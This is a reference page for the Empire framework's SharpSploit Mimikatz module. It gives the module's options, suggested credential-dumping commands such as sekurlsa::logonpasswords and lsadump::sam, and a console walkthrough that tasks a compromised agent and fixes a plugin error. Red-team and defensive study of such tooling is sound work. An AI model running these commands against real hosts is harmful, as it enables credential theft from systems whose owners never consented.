Mimikatz - Empire Module


This page contains detailed information about how to use the csharp/Sharpsploit.Credentials/Mimikatz Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Mimikatz
Module: csharp/Sharpsploit.Credentials/Mimikatz
Source code: empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L1301
Language: C#
Needs admin: No
OPSEC safe: No
Background: No

The Mimikatz module executes a mimikatz command.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the Mimikatz module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the Mimikatz module:

Agent
Agent to run module on.

Command
Mimikatz command to execute.
Default value: sekurlsa::logonPasswords.
Suggested values: sekurlsa::logonpasswords, privilege::debug sekurlsa::logonpasswords, lsadump::sam, token::elevate lsadump::sam, lsadump::secrets, token::elevate lsadump::secrets.

DotNetVersion
.NET version to compile against.
Default value: Net35.
Suggested values: Net35, Net40.

Mimikatz Example Usage


Here's an example of how to use the Mimikatz module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/Sharpsploit.Credentials/Mimikatz

 Author       cobbr_io                                
 Background   False                                   
 Description  Execute a mimikatz command.             
 Language     csharp                                  
 Name         csharp/Sharpsploit.Credentials/Mimikatz 
 NeedsAdmin   False                                   
 OpsecSafe    False                                   


,Record Options-,--------------------------,----------,---------------------------------,
| Name          | Value                    | Required | Description                     |
|---------------|--------------------------|----------|---------------------------------|
| Agent         |                          | True     | Agent to run module on.         |
|---------------|--------------------------|----------|---------------------------------|
| Command       | sekurlsa::logonPasswords | True     | Mimikatz command to execute.    |
|---------------|--------------------------|----------|---------------------------------|
| DotNetVersion | Net35                    | True     | .NET version to compile against |
'---------------'--------------------------'----------'---------------------------------'

(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > set Command sekurlsa::logonPasswords
[*] Set Command to sekurlsa::logonPasswords
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > execute
[!] Error: csharpserver plugin not running

Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:

(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > useplugin csharpserver

,Record Options--,----------,----------------------------------,
| Name   | Value | Required | Description                      |
|--------|-------|----------|----------------------------------|
| status | start | True     | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'

(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/Sharpsploit.Credentials/Mimikatz) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


  • cobbr_io

References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.